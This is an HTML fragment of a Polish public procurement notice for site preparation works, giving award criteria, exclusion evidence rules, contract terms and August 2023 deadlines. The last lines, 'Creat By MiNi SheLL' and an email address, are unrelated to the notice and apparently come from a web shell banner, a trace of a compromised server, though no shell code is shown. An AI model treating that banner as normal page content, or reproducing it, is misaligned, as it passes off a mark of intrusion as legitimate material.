class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty w następujących kryteriach: Kryterium Cena - maksymalna liczba pkt. 60 oraz kryterium Okres gwarancji - maksymalna liczba pkt. 40. Zamawiający dokona oceny ofert przydzielając punkty w każdym<br/>z przyjętych kryteriów, które następnie zostaną zsumowane.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed<br/>wyborem najkorzystniejszej oferty wezwie wykonawcę,którego oferta została najwyżej oceniona,do złożenia w wyznaczonym<br/>terminie,nie krótszym niż 5 dni,aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:1)W celu<br/>potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału w postępowaniu,o których mowa w rozdziale Xust.1 SWZ<br/>Zamawiający żąda na wezwanie,o którym mowa w ust.4 powyżej następujących dokumentów:a)oświadczenia wykonawcy,w<br/>zakresie art.108ust.1pkt 5ustawy,o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007<br/>r.o ochronie konkurencji i konsumentów(Dz.U.z2020r.poz.1076 i1086),z innym wykonawcą,który złożył odrębną ofertę,ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu,albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej(według<br/>wzoru stanowiącego załącznik nr3do SWZ);b)oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu,o którym<br/>mowa w art.125ust.1ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego,o których mowa<br/>w:-art.108ust. 1pkt 3ustawy,-art.108ust.1pkt4ustawy,dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem<br/>środka zapobiegawczego,-art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na<br/>celu zakłócenie konkurencji,-art.108ust.1pkt6 ustawy(według wzoru stanowiącego załącznik nr 4 do SWZ).5.Wykonawca nie jest<br/>zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz<br/>potwierdzi ich prawidłowość i aktualność.6.Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.7.W<br/>przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty<br/>potwierdzające,że Wykonawca nie podlega wykluczeniu składa każdy z Wykonawców oddzielnie.8.Samooczyszczenie–w<br/>okolicznościach określonych w art.108ust.1 pkt1,2,i5ustawy Pzp wykonawca nie podlega wykluczeniu jeżeli udowodni<br/>zamawiającemu, że spełnił łącznie następujące przesłanki:1)naprawił lub zobowiązał się do naprawienia szkody wyrządzonej<br/>przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem,w tym poprzez zadośćuczynienie<br/>pieniężne;2)wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym<br/>postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami,w tym<br/>organami ścigania lub zamawiającym;3)podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania<br/>dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:a)zerwał wszelkie powiązania z<br/>osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,b)zreorganizował personel,c)wdrożył<br/>system sprawozdawczości i kontroli,d)utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów,<br/>wewnętrznych regulacji lub standardów,e)wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za<br/>nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.Zamawiający ocenia, czy podjęte przez wykonawcę czynności<br/>są wystarczające do wykazania jego rzetelności,uwzględniając wagę i szczególne okoliczności czynu wykonawcy, a jeżeli uzna, że<br/>nie są wystarczające, wyklucza wykonawcę.Szczegółowe informacje zostały zawarte w rozdziale XI SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy. W takim przypadku, wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.Jeżeli oferta wykonawców, o której mowa w zdaniu poprzedzającym, została wybrana, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje dokonanie zmian postanowień treści zawartej umowy w przypadku zaistnienia okoliczności<br/>wskazanych w § 13 wzorów umów, stanowiących Załącznik nr 5a dla Części I oraz Załącznik nr 5b dla Części II. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W celu zawarcia umowy w sprawie zamówienia publicznego należy wnieść zabezpieczenie należytego wykonania umowy w wysokości 5% ceny całkowitej podanej w ofercie zarówno dla Części I jak i dla Części II. Pozostałe wymagania dotyczące zabezpieczenia należytego wykonania umowy zawarte są w rozdziale XXII SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com